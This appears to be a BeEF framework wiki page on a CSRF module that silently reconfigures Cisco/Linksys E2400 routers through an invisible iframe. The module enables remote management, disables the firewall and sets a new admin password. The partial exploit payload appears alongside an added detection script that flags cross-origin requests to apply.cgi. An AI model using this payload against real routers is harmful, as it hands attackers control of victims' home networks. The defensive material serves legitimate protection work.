Module: Cisco E2400 CSRF
Jess Williams edited this page Jan 13, 2020 · 3 revisions

- Objective: enable remote admin, disable firewall and change password on Cisco/Linksys E2400
- Authors: bcoles, n0x00
- Browsers: All

Uses an invisible iframe with a POST request to change router configurations. The victim has to be logged into the router for the action to succeed.

```javascript
var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",
  [
    {'type':'hidden', 'name':'submit_button', 'value':'Management'},
    {'type':'hidden', 'name':'change_action', 'value':''},
    {'type':'hidden', 'name':'action', 'value':'Apply'},
    {'type':'hidden', 'name':'PasswdModify', 'value':'0'},
    {'type':'hidden', 'name':'http_enable', 'value':'1'},
    {'type':'hidden', 'name':'https_enable', 'value':'1'},
    {'type':'hidden', 'name':'ctm404_enable', 'value':''},
    {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'},
    {'type':'hidden', 'name':'wait_time', 'value':'4'},
    {'type':'hidden', 'name':'need_reboot', 'value':'0'},
    {'type':'hidden', 'name':'http_passwd', 'value':passwd},
    {'type':'hidden', 'name':'http_passwdConfirm','value':passwd},
    {'type':'hidden', 'name':'_http_enable', 'value':'1'},
    {'type':'hidden', 'name':'_https_enable', 'value':'1'},
    {'type':'hidden', 'name':'web_wl_filter', 'value':'0'},
    {'type':'hidden', 'name':'remote_management', 'value':'1'},
    //.....
```
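
A defender-side check for the request this module sends, as an added example that is not part of the BeEF module or this wiki: it compares the Origin/Referer host with the Host header and lists the exposure-related fields named in the excerpt. The request object shape, the function names and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: inspect a POST to apply.cgi for signs of the CSRF described above.
// Field names come from the module excerpt; the request shape is an assumption.

// Fields from the excerpt whose value '1' exposes the admin interface remotely.
const EXPOSURE_FIELDS = ['remote_management', 'remote_mgt_https'];

// Return the host[:port] of an Origin or Referer header, or null if unusable.
function headerHost(value) {
  if (!value || value === 'null') return null;
  try { return new URL(value).host.toLowerCase(); } catch (e) { return null; }
}

// req: { method, path, headers (lower-cased names), body (urlencoded string) }
// Returns null for unrelated requests, otherwise a summary of the request.
function inspectApplyRequest(req) {
  if (req.method !== 'POST' || !/\/apply\.cgi$/.test(req.path)) return null;

  // A form submitted from the router's own pages carries an Origin/Referer
  // whose host matches Host. Missing headers are treated as untrusted.
  const host = (req.headers.host || '').toLowerCase();
  const source = headerHost(req.headers.origin) || headerHost(req.headers.referer);

  const params = new URLSearchParams(req.body);
  const changes = EXPOSURE_FIELDS.filter((f) => params.get(f) === '1');
  if (params.get('http_passwd')) changes.push('http_passwd');

  return { crossOrigin: source !== host, source, changes };
}

// Constructed sample requests (not captured traffic).
const crossSite = {
  method: 'POST', path: '/apply.cgi',
  headers: { host: '192.168.1.1', origin: 'http://hooked.example' },
  body: 'submit_button=Management&action=Apply&remote_management=1' +
        '&remote_mgt_https=1&http_passwd=x&http_passwdConfirm=x',
};
const sameSite = {
  method: 'POST', path: '/apply.cgi',
  headers: { host: '192.168.1.1', referer: 'http://192.168.1.1/' },
  body: 'submit_button=Management&action=Apply&remote_management=0',
};

console.log(inspectApplyRequest(crossSite));
console.log(inspectApplyRequest(sameSite));
```

A request that is both cross-origin and carries any of the listed changes is the pattern to reject or alert on; a per-session anti-CSRF token on the form is the stronger control.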